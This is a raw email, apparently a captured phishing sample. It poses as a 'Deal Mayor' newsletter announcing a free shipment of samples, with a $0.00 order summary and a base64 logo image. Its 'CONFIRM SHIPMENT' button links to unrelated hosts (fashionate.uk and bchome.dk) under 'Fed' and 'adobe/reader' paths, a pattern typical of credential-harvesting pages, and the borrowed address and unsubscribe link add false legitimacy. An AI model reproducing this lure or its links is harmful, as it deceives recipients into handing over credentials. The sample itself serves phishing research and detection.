From: TheDealMayor <clipper@dealmayor.com>
To: jose@monkey.org
Subject: Shipment Confirmation - Thank You So Much, Member!
Date: 19 Mar 2019 19:40:46 -0300
Message-ID: <20190319194045.E8C9A6249BAC536F@dealmayor.com>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_D333B6F8.C4B9B759"
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 80


------=_NextPart_000_0012_D333B6F8.C4B9B759
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD><TITLE></TITLE>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19301"></HEAD>
<BODY>
<P><BR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif=
; COLOR: rgb(34,34,34)">&nbsp;</P>
<DIV style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; =
COLOR: rgb(34,34,34)">
<TABLE style=3D"PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 5px; M=
ARGIN: auto; PADDING-RIGHT: 5px" cellSpacing=3D0 cellPadding=3D0 width=3D"9=
6%" align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 align=3Dcenter border=3D=
0>
<TBODY>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#ffffff height=3D12 colSpan=3D3>&nbsp;<=
/TD></TR>
<TR>
<TD style=3D"MARGIN: 0px" height=3D89 colSpan=3D3>
<DIV align=3Dcenter>
<img alt=3D"Image" src=3D"cid:r5gntxiklte.jpg" width=3D"400" height=3D"140"=
></DIV></TD></TR>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#ffffff height=3D19 colSpan=3D3>&nbsp;<=
/TD></TR>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#ffffff height=3D220 width=3D16>&nbsp;<=
/TD>
<TD style=3D'OVERFLOW: hidden; FONT-FAMILY: Gotham, "Helvetica Neue", Helve=
tica, Arial, sans-serif; BACKGROUND: rgb(220,220,220); PADDING-BOTTOM: 5px;=
 PADDING-TOP: 5px; MARGIN: 0px; border-radius: 25px' width=3D600 align=3Dce=
nter>
<P style=3D'FONT-SIZE: 18pt; FONT-FAMILY: "Lucida Grande", "Lucida Sans Uni=
code", "Lucida Sans", "DejaVu Sans", Verdana, sans-serif; FONT-WEIGHT: bold=
; COLOR: rgb(116,157,216); LINE-HEIGHT: normal; font-variant-numeric: norma=
l; font-variant-east-asian: normal; font-stretch: normal'>Thank You So Much=
, Member!</P>
<P style=3D"FONT-SIZE: 12pt; COLOR: rgb(70,70,70); LINE-HEIGHT: normal; fon=
t-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: n=
ormal">You now have access to (1)&nbsp;<B>shipment of samples</B>, complete=
ly on the house! Be directed towards confirming this gift by clicking below=
=2E&nbsp;<BR><BR>THANKS, as always, for reading our newsletter!</P>
<P style=3D"FONT-FAMILY: arial" align=3Dcenter><B>SHIPMENT SUMMARY</B></P>
<TABLE class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127=
7103m_401026308124317725gmail-m_2979890932642777249tg align=3Dcenter>
<TBODY>
<TR>
<TH class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127710=
3m_401026308124317725gmail-m_2979890932642777249tg-yw4l>Item</TH>
<TH class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127710=
3m_401026308124317725gmail-m_2979890932642777249tg-yw4l>Price</TH></TR>
<TR>
<TD class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127710=
3m_401026308124317725gmail-m_2979890932642777249tg-yw4l style=3D"FONT-FAMIL=
Y: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; MARGIN: 0px">Member&#=
8217;s SAMPLES&nbsp;&nbsp;</TD>
<TD class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127710=
3m_401026308124317725gmail-m_2979890932642777249tg-yw4l style=3D"FONT-FAMIL=
Y: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; MARGIN: 0px">$0.00</T=
D></TR>
<TR>
<TD class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127710=
3m_401026308124317725gmail-m_2979890932642777249tg-yw4l style=3D"FONT-FAMIL=
Y: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; MARGIN: 0px">Total:</=
TD>
<TD class=3Dm_3405459070888262205m_3413526759613988743m_-552820734648127710=
3m_401026308124317725gmail-m_2979890932642777249tg-21yu style=3D"FONT-FAMIL=
Y: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; MARGIN: 0px">$0.00</T=
D></TR></TBODY></TABLE><BR>
<P>&nbsp;</P>
<P style=3D"PADDING-BOTTOM: 3px; PADDING-TOP: 30px" align=3Dcenter>
<A style=3D'FONT-SIZE: 19px; FONT-FAMILY: "Lucida Grande", "Lucida Sans Uni=
code", "Lucida Sans", "DejaVu Sans", Verdana, sans-serif; FONT-WEIGHT: bold=
; COLOR: rgb(1,27,66); PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT:=
 5px; DISPLAY: inline-block; LINE-HEIGHT: normal; PADDING-RIGHT: 5px; font-=
variant-numeric: normal; font-variant-east-asian: normal; font-stretch: nor=
mal' href=3D"http://fashionate.uk/Fed/Federal/reader/index.html" target=3D_=
blank=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttp://bchome.dk/ado=
be/reader/index.html&amp;source=3Dgmail&amp;ust=3D1553060403755000&amp;usg=
=3DAFQjCNGd3_VqH1FTd3TtNyiqFIRvRCgk9w">CONFIRM SHIPMENT</A></P></TD>
<TD style=3D"MARGIN: 0px" bgColor=3D#ffffff height=3D228 width=3D17>&nbsp;<=
/TD></TR>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#ffffff height=3D24 colSpan=3D3>&nbsp;<=
/TD></TR>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#749dd8 height=3D8 colSpan=3D3><img alt=
=3D"footer-dem" src=3D"cid:ifwmfx9s.jpg" width=3D"600" height=3D"30"></TD><=
/TR>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#ffffff height=3D5 colSpan=3D3>&nbsp;</=
TD></TR>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#749dd8 height=3D8 colSpan=3D3>&nbsp;</=
TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<P style=3D"FONT-SIZE: 9pt; PADDING-BOTTOM: 20px; PADDING-TOP: 20px; PADDIN=
G-LEFT: 0px; LINE-HEIGHT: normal; PADDING-RIGHT: 0px; font-variant-numeric:=
 normal; font-variant-east-asian: normal; font-stretch: normal" align=3Dcen=
ter>
<A style=3D"FONT-SIZE: 10px; BORDER-TOP: rgb(255,255,255) 10px solid; FONT-=
FAMILY: Verdana, Geneva, sans-serif; BORDER-RIGHT: rgb(255,255,255) 10px so=
lid; BORDER-BOTTOM: rgb(255,255,255) 10px solid; COLOR: rgb(17,17,17); BORD=
ER-LEFT: rgb(255,255,255) 10px solid; DISPLAY: inline-block; LINE-HEIGHT: n=
ormal; border-radius: 15px; font-variant-numeric: normal; font-variant-east=
-asian: normal; font-stretch: normal"=20
href=3D"https://cb.sailthru.com/oc/5c8c61f8a41e4f715908e3d25c8c61f895a7a13e=
a82ff2ef/bd376c4e" target=3D_blank data-saferedirecturl=3D"https://www.goog=
le.com/url?q=3Dhttps://cb.sailthru.com/oc/5c8c61f8a41e4f715908e3d25c8c61f89=
5a7a13ea82ff2ef/bd376c4e&amp;source=3Dgmail&amp;ust=3D1553060403756000&amp;=
usg=3DAFQjCNFTWEJWxvDIfqVERDUKUwwQx-lRFQ">Remove me from this list - sorry =
to see you go!</A></P></DIV>
<P style=3D"FONT-SIZE: 9pt; FONT-FAMILY: Arial, Helvetica, sans-serif; COLO=
R: rgb(34,34,34); PADDING-TOP: 5px; LINE-HEIGHT: normal; font-variant-numer=
ic: normal; font-stretch: normal" align=3Dcenter>&nbsp;</P>
<CENTER style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-seri=
f; COLOR: rgb(34,34,34)">
<P><A class=3Dm_3405459070888262205m_3413526759613988743m_-5528207346481277=
103m_401026308124317725gmail-m_2979890932642777249unsub>Mail correspondence=
 only. Send letters to:<BR>Deal Mayor . 11601 Wilshire Blvd 5th Floor . Los=
 Angeles, CA 90025</A></P></CENTER></BODY></HTML>
------=_NextPart_000_0012_D333B6F8.C4B9B759
Content-Type: image/jpeg; name="r5gntxiklte.jpg"
Content-Transfer-Encoding: base64
Content-ID: <r5gntxiklte.jpg>

/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAMCAggICAgICAgICAgICAgICAgICAgICAgICAgI
CAgICAgICAgICAgICAgICAoICAgICQkJCAgLDgoIDQgICQgBAwQEBgUGCgYGCg0KCAoNDQ0N
DQ0OCA0KDQoNCg0IDQoICggNCAoKCggICAgICA0ICAgIDQgIDQ0ICAgICAgICP/AABEIAIwB
kAMBEQACEQEDEQH/xAAeAAEAAgIDAQEBAAAAAAAAAAAABgcEBQIICQMBCv/EAFEQAAICAQID
BAMLBwYLCQEAAAECAAMEBREGEhMHISIxFDJRCAkVI0FCUmFicYJyc4GDkqGzFzQ1dJGiM0NT
VZSVtMHD09QkJjZFVHWxssIW/8QAGwEBAAIDAQEAAAAAAAAAAAAAAAIFAwQGAQf/xABKEQAC
AQMBAwYJBgsHBQEAAAAAAgMBBBIFEyIyBhEUQlKCITFicqKywtLwFSMzQXOSJDQ1Q1FhgZGh
0eIlcYOxs8HTo8Pj8fKT/9oADAMBAAIRAxEAPwD1TgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAg
CAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCA
IAgCAIAgCAIAgCAdC/dde+qafoWRbpulULquoUkpfabOXAxbQWDUu9e75F1RXayuvkRD4erz
o6IB56dovvmvGWolh8KnBqJJFOnU1YoXf5Fv5Xy/2sloBRuv9t2s5ZJytX1PJLeZvz8q7fzH
+Mtb2wCIZec9h3d2cgbAuxYgfpgGZp/E2TVt0si+rl3C9O102B89uVhALE4W91bxNgkHF1/V
6wDvyHPyLKt/rptd6m/EkA7MdknvwXE2E6rqSYmsUd3P1K0w8rlH0L8VFpB2+WzGtgHqd7mL
3V2lcV4RytOsZbaiq5eFdyDKxXbfl6iqxDVWcrGq5N1fY+oyWIgF1QBAEAQBAEAQBAEAQBAE
AQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEA/nP8Adw8MjG4u4hrXfZtU
yb+/25TelH990ESiTWfZBI4wBAEAQD6rQfZt98A9c/eR+GwmBr2V3812Zh45Pzdsam20Af6W
YB6YQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBA
EA8GffSdH6XGuqHbYXV4Fy7DbcHBx6yf26mkiB1PnoOPL9UA49Mewf2QenLkHsEHggHKAe13
vPOimrhO2z/1GrZdg+5KcWn/AO1TSBKh3og9EAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAE
AQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQDxB997w+Xi4t/lNMwnH6DfX/APiSI1Ok89PBAEAQ
BAEA93PerdJ6XBWnN3fH359vd/Xbqv8AhSBKh26g9EAQBAEAQBAEAQBAEAQBAEAQBAEAQBAE
AQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQDxi9+dX/vNg/XomP+7Oz5KhGp0Gnp4IAgCA
IAgHv372xh8nBOhjbbevLf2+vn5Tb/vkCZ2bgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAg
CAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIB42e/R/+ItN/wDZ6v8Abc2SoRqefk9PBAEAQBAE
A/oO975xSnBmgKSCThs3d7LMi5x+5pAmdiIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAg
CAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAeOnvyOOlnEmnKbq6iNGqO9gs5djm5vy1o/skiB0Y
xeBzZ6mXpx+tsyun+P0Z6e8x9V7Ncg+rZgt8u66lgbfvyFgcxk/yQ53sw/8AWml/9bAH8kOd
7MP/AFppf/WwDH/k1yN9jbgL5d7algAd/d5jIMHhjZXBvJvz5mANhvsmT1t/qHQS1YPeY97f
e/bi3Bug94bbFdAwBAKpk3Ip2Ox8lkCR2IgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCA
IAgCAIAgCAIAgCAIAgCAIAgCAIAgHRz3YOga5VlZ75WPn6rwvnLjOraLa1WtcPX0UJVbfi1q
y+lY1zI19tLc9bc/i5OT4wDoxpHYjr2Y72cNcYfCmOgLitdS1DC1asA99d2knny+qnzugtyt
82AUD2zabq75gr1XNyM7LprFXPn25dVtaBnPQHwsmNkcqFmbwry+OTIEVp7M9QZeZMO+xd9u
ateou5+utjB7zCvsv1JvLTs5u7fw4l7d36EMDmPz+S/Uv825/wDoeT/yoPAvZdqX+bc8/V6F
k/8AKg9P1uy3Ugdjp2cu+3rYl6+fcPWQQOY/Mrs5zkANmNZUCNwbitII++10gcxefZDxvxTk
42Npmk8RZtYqVq69OwfhZjjjqOdupp2FdXyknqcy3P68AsFOx7V6MpauI+K802MV5dJ0jUM3
WNezGPf0q8RTyYjN86zNZOT/ACTyBI9J/cj8H69UbcnU1bTdOOPTi6Vob3HMyceqpmc5upZj
FjZqGTzHqbN9ltuRFgHZiAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCAIAgCA
IAgCAIAgCAIAgFO9q/uRuHNaY25+l475B7/S6Q2LmBvMN6TjNVcSPts0Aq3XvcJ5AQ1YPE+r
LRtsuHrFWHxDhqPoJTqFXOqfV1YBTHGHvc+oMDvpvBup9/rLhaloNx+s/Bmb0Af1cArbO97w
zQdv/wCPYDfvbT+MemP0DPxLjAOA97uzTsfgDiFfqXjHRiP7Tp+8AD3u7NHlw/xA59jcY6Mo
/u6fvAM3R/e58xzseE6lH0tT4vuv2+9NNw6d/wBqAWvwj73Dk18pGPwlpo896tHy9bvU/VZr
Ge9O/wBrowC5tL9w9U6dPUtc1nOo8jhY99OjaaR9D0PSKsXw/ZNpgFxdmXYbo+jIU0vTcTBD
eu1FSi1/zt53ut/WWPAJ3AEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBAEAQBA
EAQBAEAQBAEAqbRe28WuxNKDFX0xrL6shr7aKcM2jrZOOuODSmR0vilDu7b+rKiO+zbh3N76
+z2lx8BzcOsZtw/N/ObytkyrH1pEx3c+oT/B4mots6db8z9Gu/YK+wqt36bFuXlBblJCkhu7
1ZZLLStcVLtJ0krireHmy7rEK1XtmqFWW1FdhfFyqMT4+uymuy222utgrMB/g+fdt/F3c3KV
ZC+i96uLY9VsSol1VMJGjXwo6x726ubMSPE7SMKyk5CXc9YtajdarWdrV860qCdWx+71URid
j7JtLdRMuSt4DfS+hZNorbuWPX4vN4j75HHOMMI5/PzY3S6wYKd2T5AqtytzsfCqn520VuI9
nteqTreRLD0jL5vmyMfA13KANuVTjY2OK2sctks11QA3+MHQWry9fa3w/bniSPxSUoq+cQSa
b6SZVRPO3l/v3cfTOGN2nYTdwuYHrUUcr0ZFb9TJ/m45LKkfkt+bZt0z3+LukKXUTdb1utw/
vIrqFu3W6yrwv1uHq+J+1wfrOV3aTgqiWNeAllt1KOyuA1mP1OsO9fVTpv4vVO3cT3SfSosc
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
